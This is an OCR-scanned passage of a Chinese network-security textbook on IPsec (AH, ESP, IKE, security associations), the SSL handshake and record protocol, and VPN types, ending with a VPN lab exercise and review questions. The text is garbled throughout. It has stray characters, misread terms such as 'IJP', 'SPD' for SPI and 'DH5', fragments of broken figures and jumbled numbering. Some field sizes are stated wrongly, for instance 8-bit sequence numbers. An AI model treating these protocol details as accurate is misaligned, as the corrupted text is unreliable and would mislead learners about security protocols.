这 种 IP 欺骗 可 以 在 多 种 场合 制造 灾难 。 

(2) IPv4 缺乏 对 网 络 上 传输 的 数据 包 进 行 机 密 性 和 完整 性 保护 ,一 般 情况 下 IP 包 是 明 
文 传输 的 ,第 三 方 很 容易 窃听 到 IP 数据 包 并 提取 其 中 的 数据 ,甚至 自 改 穷 取 到 的 数据 包 内 
容 ,而且 不 被 发 觉 ,因为 只 要 相应 地 修改 校 验 和 即 可 。 

(3) 由 于 数据 包 中 没有 携带 时 间 惟 和 一 次 性 随机 数 等 ,很 容易 遭受 重 放 攻击 。 攻 击 者 
搜集 特定 IP 包 , 进 行 一 定 处 理 就 可 以 一 一 重新 发 送 , 欺 骗 对 方 。 

(4) 路 由 器 布局 是 Internet 的 骨架 。 路 由 器 不 设防 将 会 使 路 由 信息 暴露 ,为 攻击 者 提 
供 入 侵 途 径 。 


2. IPsec 安全 结构 


IPsec 是 一 套 协议 包 , 它 集成 了 多 种 安全 技术 ,其 安全 结构 包括 3 个 基本 协议 : 
二 ,是 沁 


(1) AH(authentication header, 认 证 报头 ) 协 议 , 为 IJP 包 提供 信息 源 验 证 和 完整 性 
保证 。 

(2) ESP(encapsulating security payload ,封装 安全 负荷 ) 协 议 ,提供 加 密 保 证 。 

(3) IKE(Internet key exchange, 密 钥 交换 ) 协 议 ,提供 双方 交流 时 的 共享 安全 信息 。 


3. IPsec 数据 包 格 式 


IPsec 数据 包 结 构 如 下 , 它 是 在 人 P 包头 后 面 增加 几 个 新 的 字段 实现 安全 保证 ,如 图 2. 17 
所 示 。 


IP 包 头 | AH 包头 | ESP 包头 | 上 层 协 议 ( 数 据 ) 


图 2.17 IPsec 数据 包 结 构 


4. 传输 模式 和 隧道 模式 


IPsec 有 两 种 运行 模式 : 

(1) 传输 模式 (transport mode) 

传输 模式 的 特点 是 : 

。 用 于 两 个 主机 之 间 ; 

。 仅 对 上 层 协 议 数据 部 分 提供 安全 保护 , 即 在 传输 模式 中 ,只 有 高 层 协议 (TCP、UDP、 
ICMP 等 ) 及 数据 进行 加 密 , 源 地 址 、 目 的 地 址 以 及 IP 包头 的 内 容 都 不 加 密 。 简 单 
地 说 ,传输 协议 为 上 层 协 议 提 供 安全 保护 。 

AH 和 ESP 都 支持 传输 协议 。 在 正常 情况 下 ,TCP 数据 包 在 IP 层 中 被 添加 IP 头 后 构 

成 数据 包 。 启 用 IPsec 后 ,IPsec 会 在 TCP 数据 


前 增加 AH 包头 或 ESP 包头 或 二 者 都 增加 ,形成 i 有 “C7 玫 


_ (a) AH 数据 包 
图 2. 18 所 示 的 3 种 传输 模式 IPsec 数据 包 。 下文 本 本 本 国 [TCF 有 
(2) 隧道 模式 (tunnel mode) | 

(b) ESP 数 据 包 


隧道 模式 的 特点 是 : 
。 用 于 一 端 是 安全 网 关 或 路 由 器 的 机 器 之 间 ; 
。 对 整个 IP 数据 包 提供 安全 保护 。 即 在 隧道 
模式 中 ,整个 用 户 的 IP 数据 包 被 用 来 计算 图 2.18 传输 模式 的 IPsec 数据 包 
ESP 包头 ,整个 IP 包 被 加 密 并 和 ESP 包头 
一 起 封装 在 一 个 新 的 IP 包 内 。 于 是 , 当 数 据 在 Internet 上 传送 时 ,真正 的 源 地 址 和 
目的 地 址 被 隐藏 起 来 。 
IPsec 不 仅 可 以 保证 隧道 的 安全 ,同时 还 有 一 套 保证 数据 安全 的 措施 ,利用 它 建 立 起 来 
的 隧道 具有 更 强 的 安全 性 和 可 靠 性 。 一 方面 它 可 以 和 L2TP 等 其 他 协议 一 起 使 用 , 另 一 方 
面 可 运行 于 网 络 的 任何 一 部 分 (路 由 器 和 防火 墙 之 间 、 路 由 器 和 路 由 器 之 间 、.PC 和 服务 器 
之 间 、PC 和 拨号 访问 设备 之 间 ) 。 
如 果 路 由 器 要 为 自己 转发 的 数据 包 提 供 IPsec 服务 ,就 要 使 用 隧道 模式 ,并 把 这 个 IP 


IP 头 | AH 头 | ESP 头 | TCP 数 据 
(c) AH-ESP 数 据 包 


人 


数据 包 作为 一 个 整体 进行 保护 ,在 这 个 IP 数据 包 之 前 添加 AH 头 或 ESP 头 , 然 后 再 添加 新 
的 IP 头 ,组 成 新 的 IP 数据 包 发 送出 去 。 形 成 的 新 的 IP 数据 包 如 图 2. 19 所 示 。 


新 正 头 AH 头 IP 头 TCP 数据 
(a) AH 数据 包 

新 全 头 ESP 头 IP 头 TCP 数据 
(b) ESP 数据 包 


图 2.19 隧道 模式 的 IPsec 数据 包 


这 种 数据 包 在 传输 过 程 中 ,路 由 器 只 检查 新 的 IP 头 。 用 于 封装 新 IP 头 , 定 义 了 从 源 路 
由 器 到 目的 路 由 器 之 间 的 一 条 虚拟 路 径 , 这 就 是 隧道 。 


5. 安全 协同 


安全 协同 (security associations,SA) 是 IPsec 的 一 个 关键 概念 , 它 构成 了 IPsec 的 基础 。 
AH 协议 和 ESP 协议 的 执行 都 依赖 于 SA。 

(1) SA 的 内 容 和 标识 

SA 是 两 个 IPsec 实体 (主机 、 安 全 网 关 ) 之 间 经 过 协商 建立 起 来 的 一 种 协定 ,内 容 包 括 : 

。 采用 何 种 IPsec 协议 (AH ESP)， 

。 运行 模式 (传输 模式 、 隧 道 模式 ); 

。 采用 的 验证 算法 .加 密 算法 .加密 密 钥 . 密 钥 生存 期 . 抗 重 放 窗 口 .计数 器 等 ; 

。 保护 什么 ”如 何 保护 ” 谁 来 保护 ? 

一 个 SA 通过 一 个 三 元 组 唯一 标识 : 

(安全 参数 索引 SPI, 目 的 IP 地 址 ,安全 协议 (AH 或 ESP) 标 识 符 ) 

(2) SA 提供 的 安全 服务 

SA 提供 的 安全 服务 取决 于 所 选 的 安全 协议 .SA 模式 .SA 作用 的 两 端点 和 安全 协议 所 
要 求 的 服务 。 例 如 ,AH 为 IP 数据 包 提 供 的 服务 有 : 

。 数据 源 验 证 (但 不 对 数据 包 加 密 ); 

。 无 连接 完整 性 ; 

。 抗 重播 服务 。 

接收 端 是 否 需 要 这 一 服务 ,可 以 自行 决定 。 

ESP 为 SA 提供 的 服务 有 : 

。 加 密 和 验证 (不 包括 外 IP 头 ) ,或 者 选择 其 中 之 一 。 这 种 有 限 业 务 流 机 密 性 可 以 隐 

藏 数据 包 的 源 地 址 和 最 终 目的 地 址 。 

。 对 数据 包 进行 填充 ,从 而 隐藏 了 数据 包 的 真实 大 小 ,进而 隐藏 了 其 通信 特征 。 

。 抗 重播 服务 。 

SA 仅 为 其 上 所 携带 的 业务 流 提 供 一 种 安全 机 制 (AH 或 ESP)。 如 果 需 要 对 特定 业务 
提供 多 种 安全 保护 ,就 要 有 多 个 SA 序列 的 组 合 一 一 SA 捆绑 。 
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6. 安全 策略 数据 库 与 安全 协同 数据 库 


在 IPsec 中 ,为 处 理 IP 业务 流 ,需要 维护 两 个 与 SA 相关 的 数据 库 : 安全 策略 数据 库 
(security policy database, SPD) 与 安全 协同 数据 库 (security association database,SAD) 。 

SD 

SAD 由 一 系列 SA 条 目 组 成 ,每 个 条 目 定义 了 一 个 SA 的 参数 ,所 以 SAD 包含 了 与 每 
个 活动 SA 相关 的 所 有 参数 信息 。 

{2SPD 

安全 策略 (security policy,SP) 定 义 了 对 所 有 输入 数据 /输出 数据 应 当 采 取 的 安全 策略 ， 
决定 了 为 一 个 包 提 供 的 安全 服务 以 及 以 什么 方式 提供 。SPD 实际 上 不 是 通常 意义 上 的 数 
据 库 , 而 是 将 所 有 的 SP 定义 了 对 所 有 输出 /输入 业务 应 当 采 取 的 安全 策略 ,以 某 种 数据 结 
构 集中 存储 列表 。 当 要 将 IP 包 发 出 去 或 者 接收 到 IP 包 时 ,首先 要 查找 SPD 来 决定 如 何 进 
行 处 理 。 


SPD 对 IP 包 的 处 理 有 3 种 可 能 : 
。 丢弃 ; 
。 绕 过 不 用 IPsec; 


。 采用 IPsec。 
7. IPsec 体系 结构 


IPsec 各 部 件 之 间 的 关系 结构 如 图 2. 20 所 示 。 


IPsec 安全 体系 
| 
1 
ESP 协 议 
i 
加 密 算法 验证 算法 
IKE 协 议 


图 2.20 ”IPsec 各 部 件 之 间 的 关系 结构 


8. IPsec 协议 的 进一步 分 析 


(1) AH 协议 

AH 为 IP 包 提供 数据 完整 性 和 验证 服务 ; 

。 对 数据 使 用 完整 性 检查 ,可 以 判定 数据 包 在 传输 过 程 中 是 否 被 修改 。 

。 通过 验证 机 制 ,终端 系统 或 设备 可 以 对 用 户 或 应 用 进行 验证 ,并 过 滤 通 信 流 ,还 可 以 
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防止 地 址 欺骗 和 重 放 攻 击 。 
AH 具有 图 2. 21 所 示 的 格式 。 
0 78 1516 31 
下 -不 天 | 载荷 k 度 | 保留 
安全 参数 索引 (SPD 
序列 号 


验证 数据 (可 变 ) 


图 2.21 AH 格式 


下 一 个 头 (8 比特 ): 标识 紧 跟 验证 头 的 下 一 个 头 的 类 型 。 


载荷 长 度 (8 比特 ): 是 以 32 比特 为 单位 的 验证 数据 长 度 加 1。 如 默认 的 验证 数据 字 


段 长 度 为 96 比特 ,为 3 个 32 比特 ;3 加 上 1, 得 4, 即 默 认 的 验证 数据 的 AH 头 的 载 


荷 长 度 为 4。 
保留 (16 比特 ): 备 以 后 使 用 。 
安全 参数 索引 (32 比特 ) : 用 于 标识 一 个 安全 协同 。 


序列 号 (8 比特 ) : 无 符号 单调 递增 计数 值 , 用 于 IP 数据 包 的 重 放 检查 。 
验证 数据 (32 比特 的 整数 倍 的 可 变 长 数据 ): 包含 数据 包 的 ICV (完整 性 校 验 值 ) 


或 MAC。 
(2) ESP 协议 
ESP 协议 为 IP 数据 包 提供 如 下 服务 : 
。 数据 源 验 证 ; 
。 数据 完整 性 ; 
。 抗 重 放 ; 
。 机 密 性 。 
ESP 具有 图 2. 22 所 示 的 格式 。 其 中 各 项 内 容 说 明 如 下 。 
0 78 15 16 23 24 31 
安全 参数 索引 (SPD) 
序列 号 
a 初始 化 向 量 | 
| 一 载荷 数据 (可 变 ) 一 
填充 ( 0~ 255 比 特 ) 


填充 长 度 “| 下 一 个 头 


验证 数据 (可 变 ) 


图 2.22 ESP 格式 
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下 一 个 头 (8 比特 ) : 通过 标识 载荷 中 的 第 一 个 头 ( 如 IPv6 中 的 扩展 头 ,或 诸如 TCP 
等 上 层 头 ) 决 定 载荷 数据 字段 中 数据 的 类 型 。 
安全 参数 索引 (32 比特 ) : 标识 一 个 安全 协同 。 
序列 号 (8 比特 ) : 无 符号 单调 递增 计数 值 ,用 于 IP 数据 包 的 重 放 检查 。 
验证 数据 (32 比特 的 整数 倍 的 可 变 长 数据 ): 用 于 填 和 人 ICV( 完 整 性 校 验 值 ) 。ICV 
的 计算 范围 为 ESP 包 中 除 掉 验 证 数据 字段 部 分 。 
填充 (0 一 255 比特 ) : 额外 字 节 。 
填充 长 度 (8 比特 ) : 填充 的 字 节 数 。 
载荷 数据 (可 变 ) : 在 传输 模式 下 是 传输 层 数据 段 ,在 隧道 模式 下 是 IP 包 。 

(3) 密 钥 交换 协议 

IPsec 的 密 钥 管理 包括 密 钥 的 确定 和 分 配 , 可 以 采用 手工 或 自动 方式 进行 。IPsec 默认 
的 自动 密 钥 管 理 协 议 是 IKE。 

IKE 规定 了 验证 IPsec 对 等 实体 .协商 安全 服务 和 生成 会 话 密 钥 的 方法 。IKE 将 密 钥 
协商 结果 保留 在 SA 中 , 供 AH 和 ESP 以 后 通信 时 使 用 。 

IKE 有 4 种 身份 认证 方式 : 

。 基于 数字 签名 的 认证 , 即 利用 数字 证 书 表示 身份 ,利用 数字 签名 算法 计算 出 一 个 签 

名 来 验证 身份 。 
。 基 于 公开 密 钥 的 认证 , 即 用 对 方 的 公 钥 加 密 身 份 ,通过 检查 对 方 发 来 的 Hash 值 进 
行 认证 。 

。 基于 修正 的 公 钥 ,对 上 述 方式 修正 。 

。 基于 预 共 享 字符 串 , 即 双方 事先 商定 好 一 个 双方 共享 的 字符 串 。 

DOI 的 作用 是 为 使 用 IKE 进行 协商 SA 的 协议 统一 分 配 标 识 符 。 

(4) 加 密 和 验证 算法 

IPsec 的 加 密 只 用 于 ESP。 目 前 的 IPsec 标准 要 求 任 何 IPsec 实现 都 必须 支持 DES ,此 
外 还 可 以 使 用 3DES、RC5、IDEA、3IDEA、CAST 和 Blowfish。 由 于 DES 在 网 络 上 加 密 的 
缺点 ,今后 将 有 采用 3DES 和 AES( 高 级 加 密 标 准 ) 的 趋势 。 

IPsec 的 验证 算法 可 用 于 AH 和 ESP, 主 要 采用 HMAC。HMAC 将 消息 和 密 钥 作为 输 
入 来 计算 MAC。MAC 保存 在 AH/ESP 头 中 的 验证 数据 字段 中 。 目 的 地 收 到 IP 包 后 ,使 
用 相同 的 验证 算法 和 密 钥 计 算 一 个 新 的 MAC ,并 与 数据 包 中 的 MAC 比 对 。 


2.5.2 SSL 


SSL 是 Netscape 公司 提出 的 一 种 构建 在 TCP 之 上 、 应 用 层 之 下 的 Internet 通信 的 安 
全 标准 。1999 年 ,SSL 被 [ETF 接受 后 ,经 过 改进 以 TLS(transport layer security) 协 议 为 
名 推出 。 于 是 ,形成 有 专利 保护 的 SSL 和 成 为 标准 的 TLS 两 种 版 本 。 不 过 ,SSL 已 经 成 为 
事实 上 的 标准 。 虽 然 SSL 的 初衷 是 为 Web 提供 安全 服务 ,但 是 由 于 它 与 应 用 层 协议 无 关 
性 的 开发 思想 ,使 其 可 以 为 各 种 高 层 应 用 协议 提供 透明 的 安全 服务 。 其 中 在 Web 服务 器 和 
浏览 器 之 间 的 安全 通信 则 是 它 最 典型 的 应 用 ,几乎 所 有 Web 服务 器 和 浏览 器 都 支持 它 ,并 
且 把 基于 SSL 的 HTTP 协议 称 为 HTTPS 协议 。 

和 让 


1. SSL 的 工作 过 程 


SSL 的 设计 目标 是 基于 客户 /服务 器 工作 方式 (点 对 点 的 信息 传输 ) ,使 高 层 协议 在 进 
行 通信 之 前 就 能 完成 加 密 算法 、 密 钥 协 商 和 服务 器 的 认证 ,并 在 此 基础 上 进行 加 密 的 安全 通 
信 ( 即 对 发 送 的 消息 数据 进行 分 组 、 压 缩 ,进行 加 密 , 生 成 认证 码 ), 为 应 用 会 话 提供 防 窃听 、 
防 算 改 和 防 消息 伪造 服务 。 所 以 它 位 于 应 用 层 和 传输 层 之 间 。 

实现 上 述 目 标的 基本 过 程 如 下 。 

(1) 安全 协商 : 互相 交换 SSL 版 本 号 和 所 支持 的 加 密 算法 等 信息 。 

(2) 彼此 认证 ， 

。 服务 器 将 自己 由 CA 的 私 钥 加 密 的 证 书 告诉 浏览 器 。 服 务 器 也 可 以 向 浏览 器 发 出 

证 书 请 求 , 对 浏览 器 进行 认证 。 
。 浏览 器 检查 服务 器 的 证 书 ( 是 否 由 自己 列表 中 的 某 个 CA 颁发 ): 如 果 不 合法 , 则 终 
止 连接 ;如 果 合 法 , 则 进入 生成 会 话 密 钥 步 又 。 

。 如 果 服 务 器 有 证 书 请 求 ,浏览 器 也 要 发 送 自己 的 证 书 。 

(3) 生成 会 话 密 钥 : 

。 浏览 器 用 CA 的 公 钥 对 服务 器 的 证 书 解密 ,获得 服务 器 的 公 

。 浏览 器 生成 一 个 随机 会 话 密 钥 ,用 服务 器 的 公 钥 加密 后 发 送 给 服务 器 。 

(4) 启动 会 话 密 钥 

。 浏览 器 向 服务 器 发 送 消息 : 告诉 以 后 自己 发 送 的 信息 将 用 协商 好 的 会 话 密 钥 加 密 。 

。 浏览 器 再 向 服务 器 发 送 一 个 加 密 消息 : 告诉 会 话 协商 过 程 完成 。 

。 服务 器 向 浏览 器 发 送 消息 : 告诉 以 后 自己 发 送 的 信息 将 用 协商 好 的 会 话 密 钥 加 密 。 

。 服务 器 再 向 浏览 器 发 送 一 个 加 密 消 息 : 告诉 会 话 协商 过 程 完成 。 

(5) SSL 会 话 正式 开始 : 双方 用 协商 好 的 会 话 密 钥 加 密 发 送 的 消息 。 


2. SSL 体系 结构 


为 了 实现 上 述 过 程 ,SSL 体系 结构 由 两 层 组 成 : 

(1) 握手 层 (管理 层 ) : 用 于 密 钥 的 协商 和 管理 ,由 握手 协议 、 密 钥 更 改 协 议和 报警 协议 
组 成 。 

。 SSL 握手 协议 (handshake protocol) : 准许 服务 器 端 与 客户 端 在 开始 传输 数据 前 ,可 

以 通过 特定 的 加 密 算法 相互 鉴别 。 

。 SSL 更 改 密码 说 明 协 议 (change cipher spec) : 保证 可 扩展 性 。 

。 SSL 警告 协议 (alert protocol) : 产生 必要 的 警告 信息 。 

(2) 记录 层 : 运行 SSL 记录 协议 (record protocol) ,为 高 层 应 用 协议 提供 各 种 安全 服 
务 , 对 上 层 数 据 进 行 加 密 、 产 生 MAC 等 并 进行 封装 。 

图 2. 23 表明 LLS 在 TCP/IP 协议 栈 中 的 位 置 。 它 位 于 传输 层 之 上 、 应 用 层 之 下 ,并 独 
立 于 应 用 层 ,使 应 用 层 可 以 直接 建立 在 SSL 上 。 
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图 2.23 SSL 体系 结构 
3. SSL 握手 


连接 (connection) 和 会 话 (session) 是 SSL 中 的 两 个 重要 概念 : 一 个 SSL 会 话 是 客户 机 
与 服务 器 之 间 的 一 个 关联 ,一 个 SSL 连接 提供 一 种 合适 服务 类 型 的 传输 。SSL 连接 是 点 对 
点 的 关系 ,并 且 连 接 是 暂时 的 ,每 一 个 连接 只 与 一 个 会 话 关 联 。 会 话 定 义 了 一 组 可 供 多 个 连 
接 共享 的 加 密 安 全 参数 ,以 避免 为 每 一 个 连接 提供 新 的 安全 参数 所 需 的 昂贵 谈判 代价 。 

客户 机 与 服务 器 要 建立 一 个 会 话 , 就 必须 进行 握手 过 程 。SSL 会 话 由 SSL 握手 协议 创建 
或 恢复 。 图 2. 24(a) 为 创建 一 个 会 话 的 握手 过 程 ,图 2. 24(b) 为 恢复 一 个 会 话 的 握手 过 程 。 
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(a) 创建 一 个 会 话 (b) 恢复 一 个 会 话 
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图 2.24 SSL 握手 过 程 


下 面 主 要 介绍 创建 会 话 时 的 握手 过 程 。 
(1) Hello 阶段 
握手 协议 从 Client 发 出 的 第 一 道 信 息 ClientHello 开始 。 
Q@ ClientHello 和 ServerHello 用 于 协商 安全 参数 ,包括 : 协议 版 本 号 ,会 话 识别 码 (session 
_id) .时间 戳 .密码 算 法 协商 (cipher suit)、 压缩 算法 .两 个 28 字 节 随机 数 (ClientHello. random 
二 省 入 二 


和 ServerHello. random) 。 

@ Certificate 是 密 钥 交换 信息 ,在 验证 Server 时 发 出 。 

@ ServerKeyExchange 送出 Client 可 以 计算 出 共享 秘密 的 参数 ,包含 Server 临时 公 
钥 。 这 些 信 息 一 般 包含 在 Certificate 中 。 只 在 下 列 情况 下 才 由 Server 发 出 : 

。 不 需要 验证 Server; 

。 要 求 验证 Server, 但 Server 无 证 书 或 Server 证 书 是 用 于 签名 。 

@ CertificateRequest 是 在 Server 要 求 验 证 Client 时 发 出 。 

@ ServerHelloDone 表示 双方 握手 过 程 的 Hello 阶段 结束 。 

这 时 ,Server 等 待 Client 回音 。 

(2) 加 解密 参数 传输 

@ Certificate 回答 Server 的 CertificateRequest 要 求 的 信息 。Server 无 要 求 时 ,不 发 。 

@ ClientKeyExchange 对 ClientHello 和 ServerHello 密 钥 交换 算法 回复 ,以 Server- 
KeyExchange 所 选 的 算法 进行 ,让 双方 可 以 共享 秘密 。 

@ CertificateVerify 对 此 前 Server 送 来 的 所 有 信息 (CClientHello .ServerHello .Certifi- 
cate 和 ServerKeyExchange) 产 生 签名 ,让 Server 进一步 确定 Client 的 正确 性 。 

@ ExchangeCipherSpec 为 SSL 更 改 密码 时 说 明 协 议 消息 。 

@ 用 协商 好 的 算法 和 密 钥 加 密 Finished 消息 , 即 握手 完成 消息 。 

(3) Server 确认 

@ ExchangeCipherSpec 为 回复 Client 的 ExchangeCipherSpec 消息 。 

@ 用 协商 好 的 算法 和 密 钥 加 密 Finished 消息 , 即 握手 完成 消息 。 

(4) 会 话 数据 传输 

恢复 一 个 已 经 存在 的 会 话 时 ,握手 过 程 一 般 只 需要 Hello 阶段 。 


4. SSL 记录 协议 的 封装 


在 SSL 


体系 中 , 当 上 层 (应 用 层 或 表示 层 ) 的 应 用 要 选用 SSL 协议 时 ,上 层 (握手 .警告 、 


更 改 密码 说 明 、HTTP 等) 协议 信息 会 通过 SSL 记录 子 协议 使 用 一 些 必要 的 程序 ,将 加 密 
码 、 压 缩 码 .MAC 等 封装 成 若干 个 数据 包 , 再 通过 其 下 层 ( 基 本 上 都 是 从 呼叫 socket 接口 
层 ) 传 送出 去 。 

记录 协议 的 封装 过 程 如 图 2. 25 所 示 。 


2.5.3 VPN 


1. VPN 的 基本 原理 


虚拟 专 


用 网 (virtual private network,VPN) 是 指 将 物理 上 分 布 在 不 同 地 点 的 专用 网 


络 , 通 过 不 可 信任 的 公共 网 络 构造 成 逻辑 上 信任 的 虚拟 子 网 ,进行 安全 的 通信 。 这 里 公共 网 
络 主要 指 Internet。 


图 2. 26 


为 VPN 的 结构 示意 图 。 在 这 个 图 中 有 3 个 内 部 网 ,它们 都 位 于 一 个 VPN 设备 的 


后 面 , 同 时 由 路 由 器 连接 到 公共 网 。VPN 技术 采用 了 安全 封装 、 加 密 、 认 证 、 存 取 控制 数据 完 


。89 。 
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图 2.25 记录 协议 的 封装 过 程 


整 性 等 措施 ,使 得 敏感 信息 只 有 预定 的 接收 者 才能 读 懂 , 实 现 信 息 的 安全 传输 ,使 信息 不 被 泄 
露 . 算 改 和 复制 ,相当 于 在 各 VPN 设备 间 形 成 一 些 跨越 Internet 的 虚拟 通道 一 一 “隧道 ”。 


专 网 2 


图 2.26 VPN 的 结构 与 基本 原理 


隧道 的 建立 主要 有 两 种 方式 : 客户 启动 (client-initiated) 和 客户 透明 (client-transpar- 
ent) 。 客 户 启动 也 称 自愿 型 隧道 ,要求 客户 和 服务 器 (或 网 关 ) 都 安装 特殊 的 隧道 软件 ,以 便 
在 Internet 中 可 以 任意 使 用 隧道 技术 ,完全 地 控制 自己 数据 的 安全 。 客 户 透明 也 称 强制 型 隧 
道 , 只 需要 服务 器 端 安 装 特殊 的 隧道 软件 ,客户 软件 只 用 来 初始 化 隧道 ,并 使 用 用 户 ID 口令 
或 数字 证 书 进行 权限 鉴别 ,使 用 起 来 比较 方便 ,主要 供 ISP 将 用 户 连接 到 Internet 时 使 用 。 
VPN 的 基本 处 理 过 程 为 : 
。 要 保护 的 主机 发 送 明文 信息 到 其 VPN 设备 ; 
。 VPN 设备 根据 网 络 管理 员 设 置 的 规则 ,确定 是 对 数据 进行 加 密 还 是 直接 传送 ; 
。 对 需要 加 密 的 数据 ,VPN 设备 将 其 整个 数据 包 ( 包 括 要 传送 的 数据 、 源 IP 地 址 和 目 
标 IP 地 址 ) 进 行 加 密 并 附 上 数字 签名 ,加 上 新 的 数据 报头 (包括 目的 地 VPN 设备 需 
要 的 安全 信息 和 一 些 初始 化 参数 ) ,重新 封装 ; 


本 才思 


。 将 封装 后 的 数据 包 通 过 隧道 在 公共 网 上 传送 ; 
* 数据 包 到 达 目的 VPN 设备 ,将 数据 包 解 封 , 核 对 数字 签名 无 误 后 ,对 数据 包 解 密 。 


2. 隧道 结构 


隧道 技术 是 VPN 技术 的 核心 , 它 涉及 数据 的 封装 ,可 以 利用 TCP/IP 协议 作为 主要 传 
送 协 议 以 一 种 安全 的 方式 在 公用 网 络 ( 如 Internet) 上 传送 。 

在 VPN 中 ,双方 的 通信 和 量 很 大 ,并 且 双 方 往往 很 熟悉 ,这 样 就 可 以 使 用 复杂 的 专用 加 
密 和 认证 技术 对 通信 双方 的 VPN 进行 加 密 和 认证 。 为 了 实现 这 些 功 能 ,隧道 被 构造 为 3 
层 结 构 : 

(1) 最 底层 是 传输 。 传 输 协议 用 来 传输 上 层 的 封装 协议 ,IP.ATM、PVC 和 SVC 都 是 
非常 合适 的 传输 技术 。 因 为 IP 具有 强大 的 路 由 选择 能 力 ,可 以 运行 于 不 同 的 介质 上 ,因而 
应 用 最 为 广泛 。 

(2) 第 二 层 是 封装 。 封 装 协议 用 来 建立 .保持 和 拆 印 隧 道 , 或 者 说 是 数据 的 封装 .打包 
与 拆 包 。 

(3) 第 三 层 是 认证 。 


3. VPN 实现 技术 


目前 ,实现 VPN 的 主要 技术 有 两 种 : 一 种 是 基于 IPsec 协议 的 VPN 模式 ,一 种 是 基于 
SSL 协议 的 VPN 模式 。 关 于 它们 的 具体 实现 方法 ,这 里 不 再 歼 述 。 


4. VPN 的 服务 类 型 


从 应 用 的 角度 看 ,VPN 的 服务 大 致 有 如 下 3 种 类 型 。 

(1) 远程 访问 VPN(access VPN) 

远程 访问 VPN 适合 于 在 外 地 流动 办 公 的 情况 。 这 时 的 驻 外 工作 人 员 只 能 通过 宾馆 或 
其 他 的 设施 以 拨号 方式 与 本 部 进行 VPN 连接 ,利用 HTTP、FTP 等 或 其 他 网 络 服务 与 本 部 
交换 信息 。 

(2) 内 联 VPN(intranet VPN) 

内 联 VPN 适合 在 外 地 有 固定 分 支 机 构 的 情形 。 这 时 , 驻 外 分 支 机 构 通 过 ISP 与 本 部 
进行 VPN 安全 连接 。 

(3) 外 联 VPN(extranet VPN) 

外 联 VPN 适合 于 与 业务 伙伴 之 间 通 信 的 连接 。 这 时 ,往往 需要 通过 专线 连接 公共 基 
础 设施 ,并 借助 电子 商务 软件 等 与 本 部 进行 VPN 连接 。 


实验 6 实现 一 个 VPN 连接 


1. 实验 目的 


(1) 理解 VPN 的 工作 原理 。 
(2) 了 解 VPN 的 应 用 。 
。9] 。 


(3) 掌握 VPN 实现 的 技术 方法 。 
2. 实验 内 容 


(1) 实验 一 个 VPN 连接 。 
(2) 测试 连接 后 的 VPN 网 络 。 


3. 建议 环境 


(1) 在 Windows 操作 系统 中 利用 PPTP(point-to-point tunneling protocol, 点 对 点 隧道 
协议 ) 配 置 VPN 网 络 , 即 在 Windows 2000 Server 中 选择 “开始 ”一 “程序 ”一 “管理 工具 ”， 
单 击 “ 路 由 和 远程 访问 ”……… 

(2) 在 Windows 中 配置 IPsec, 即 选择 “开始 ”程序 ”管理 工具 ”, 进 入 “本 地 安全 
策略 ?界面 。 在 右 侧 窗口 中 ,可 以 看 到 默认 情况 下 Windows 内 置 的 “安全 服务 器 ”"“ 客 户 
端 "“ 服 务 器 ”3 个 安全 选项 ,并 附 有 描述 。 

(3) 在 Linux 操作 系统 中 利用 CIPE 配置 VPN。CIPE(crypto IP encapsulation) 主 要 
是 为 Linux 而 开发 的 VPN 实现 软件 。CIPE 使 用 默认 的 CIPE 加 密 机 制 (标准 的 Blowfish 
或 IDEA 加 密 算法 ) 来 加 密 IP 分 组 ,并 把 这 些 分 组 添加 目标 头 信 息 后 封装 或 “包围 ?在 数据 
报 (UDP) 中 。 然 后 ,这 些 UDP 分 组 即 可 通过 CIPE 虚拟 网 络 设 备 (cipcbx) 和 IP 层 。 


4. 实验 准备 


(1) 对 要 使 用 的 VPN 连接 进行 需求 分 析 。 

(2) 根据 需求 分 析 提 出 使 用 的 VPN 连接 方案 。 

(3) 设计 实现 确定 的 VPN 方案 所 需要 的 软 硬 件 环境 。 
(4) 设计 进行 VPN 连接 的 步骤 。 

(5) 设计 进行 VPN 连接 测试 的 方法 和 步骤 。 


5. 推荐 的 分 析 讨论 内 容 


(1) 搜集 各 种 VPN 实现 技术 ,并 进行 比较 。 

(2) 对 自己 实现 的 VPN 进行 安全 风险 分 析 ,提出 改进 设想 。 

(3) 有 的 计算 机 网 络 具 有 单 入 口 点 , 即 出 入 网 络 的 所 有 数据 都 只 通过 单个 网 关 ( 路 由 器 
或 防火 墙 ) ,而 有 的 网 络 中 使 用 了 多 个 网 关 。 在 这 两 种 情况 下 ,进行 VPN 配置 有 什么 区 别 ? 

(4) 其 他 发 现 或 想到 的 问题 。 


习 题 


1. 假定 数据 在 信道 上 是 加 密 传输 的 ,那么 采用 MAC 认证 就 会 呈现 两 种 方式 : 
(1) 对 明文 认证 , 即 在 发 送 方 将 报 文 及 其 MAC 一 起 加 密 , 接 收 方 解 密 后 ,将 其 分 成 两 
部 分 ,再 对 解密 后 的 明文 生成 MAC 与 传输 来 的 MAC 进行 比较 。 
(2) 对 密 文 认证 , 即 接收 方 在 未 解密 前 先 对 报 文 的 密 文 生成 MAC' 与 由 A 方 传 送 来 的 
。 092 。 


MAC 的 密 文 进行 比较 。 
用 图 说 明 以 上 两 种 MAC 认证 方式 的 认证 过 程 。 


~] 中 上 co 


. 分 析 消 息 认证 码 可 能 遭受 的 攻击 。 

. 查找 资料 ,描述 MD5 算法 的 处 理 过 程 , 并 针对 DH5 设计 一 个 攻击 算法 。 

.查找 资料 ,描述 SHA 算法 的 处 理 过 程 。 

. 描述 报 文 鉴别 码 和 杂凑 码 的 区 别 。 

. 简 述 数字 签名 的 用 途 和 基本 流程 。 

. 要 将 名 文 M 由 Al 并 附 有 Ai,A:,…',Ai,…，,A, 的 依次 签名 发 往 B。 设 PKA 和 


SKA 分 别 为 A; 的 公开 密 钥 和 私有 密 钥 ,在 签名 时 要 求 每 一 位 签名 者 只 验证 其 前 一 位 签名 
者 的 签名 。 如 果 验 证 通过 , 则 在 此 基础 上 加 上 自己 的 签名 ,否则 终止 签名 。 最 后 一 位 签名 者 
在 签名 完成 后 将 最 终 信息 和 签名 一 起 发 送出 去 。 每 一 位 签名 者 都 可 以 推算 出 前 一 位 签名 者 
和 后 一 位 签名 者 并 且 知 道 他 们 的 公开 密 钥 。 试 设计 该 多 人 签名 算法 。 


8. 
9 


10. 
1 
12. 
13， 
14. 
15. 
16. 
1 
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查阅 相关 资料 ,比较 各 种 数字 签名 算法 的 优 缺 点 。 
何 为 重 放 攻击 ? 请 举例 说 明 。 
可 信 第 三 方 有 哪些 作用 ? 
数字 签名 进程 需要 哪些 数据 ? 
